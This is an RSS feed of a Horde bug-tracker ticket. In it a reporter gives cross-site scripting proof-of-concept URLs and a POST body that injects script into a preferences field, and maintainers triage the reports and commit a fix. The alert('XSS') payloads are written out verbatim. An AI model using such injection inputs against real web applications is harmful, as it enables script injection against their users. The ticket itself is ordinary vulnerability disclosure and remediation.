<?xml version="1.0" encoding="ISO-8859-1"?> 
<?xml-stylesheet href="http://bugs.horde.org/themes/feed-rss.xsl" type="text/xsl"?> 
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> 
 <channel> 
  <title>Number preferences are not validated properly</title> 
  <pubDate>Tue, 16 Mar 2010 07:43:20 -0400</pubDate> 
  <link>http://bugs.horde.org/ticket/8399</link> 
  <atom:link rel="self" type="application/rss+xml" title="Number preferences are not validated properly" href="http://bugs.horde.org/ticket/8399/rss" /> 
  <description>Number preferences are not validated properly</description> 
 
   
   
  <item> 
   <title>Multiple cross site scripting vulnerabilites exist.  Proof o</title> 
   <description>Multiple cross site scripting vulnerabilites exist.  Proof of concepts:



http://hordeserver.com/horde/services/images/colorpicker.php?form=//--&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;



https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&amp;target=color&quot;];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[&quot;



https://hordeserver.com/horde/test.php?mode=extensions&amp;ext=&lt;script&gt;alert('XSS')&lt;/script&gt;



POST to http://hordeserver.com/horde/services/prefs.php with the following content:



actionID=update_prefs&amp;group=display&amp;app=horde&amp;initial_application=horde&amp;theme=azur&amp;summary_refresh_time=0&amp;show_sidebar=on&amp;sidebar_width=1337//--&gt;%0d%&lt;script&gt;alert('XSS')&lt;/script&gt;//&amp;menu_view=text&amp;menu_refresh_time=0&amp;widget_accesskey=on</description> 
   <pubDate>Fri, 03 Jul 2009 14:48:49 -0400</pubDate> 
   <link>http://bugs.horde.org/ticket/8399#t54781</link> 
  </item> 
   
  <item> 
   <title>&gt; Multiple cross site scripting vulnerabilites exist.  Proof</title> 
   <description>&gt; Multiple cross site scripting vulnerabilites exist.  Proof of concepts:



Horde 3.1 has been deprecated for a long time. The current stable version is 3.3, and we backport serious security fixes to 3.2.



&gt; http://hordeserver.com/horde/services/images/colorpicker.php?form=//--&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;

&gt; https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&amp;target=color&quot;];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs[&quot;



This file doesn't exist in 3.2 or later.



&gt; https://hordeserver.com/horde/test.php?mode=extensions&amp;ext=&lt;script&gt;alert('XSS')&lt;/script&gt;



This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&amp;r2=1.9



&gt; POST to http://hordeserver.com/horde/services/prefs.php with the 

&gt; following content:

&gt;

actionID=update_prefs&amp;group=display&amp;app=horde&amp;initial_application=horde&amp;theme=azur&amp;summary_refresh_time=0&amp;show_sidebar=on&amp;sidebar_width=1337//--&gt;%0d%&lt;script&gt;alert('XSS')&lt;/script&gt;//&amp;menu_view=text&amp;menu_refresh_time=0&amp;widget_accesskey=on



This I can actually reproduce as a problem. Patch forthcoming.</description> 
   <pubDate>Sat, 11 Jul 2009 17:08:06 -0400</pubDate> 
   <link>http://bugs.horde.org/ticket/8399#t54916</link> 
  </item> 
   
  <item> 
   <title>Changes have been made in CVS for this ticket:

http://cvs.h</title> 
   <description>Changes have been made in CVS for this ticket:

http://cvs.horde.org/diff.php/framework/Prefs/Prefs/UI.php?rt=horde&amp;r1=1.104&amp;r2=1.105&amp;ty=u
http://cvs.horde.org/diff.php/horde/docs/CHANGES?rt=horde&amp;r1=1.1239&amp;r2=1.1240&amp;ty=u
http://cvs.horde.org/diff.php/horde/lib/prefs.php?rt=horde&amp;r1=1.53&amp;r2=1.54&amp;ty=u</description> 
   <pubDate>Sat, 11 Jul 2009 19:29:14 -0400</pubDate> 
   <link>http://bugs.horde.org/ticket/8399#t54918</link> 
  </item> 
   
  <item> 
   <title>Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cv</title> 
   <description>Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).</description> 
   <pubDate>Sat, 11 Jul 2009 19:40:05 -0400</pubDate> 
   <link>http://bugs.horde.org/ticket/8399#t54919</link> 
  </item> 
   
   
 
 </channel> 
</rss> 
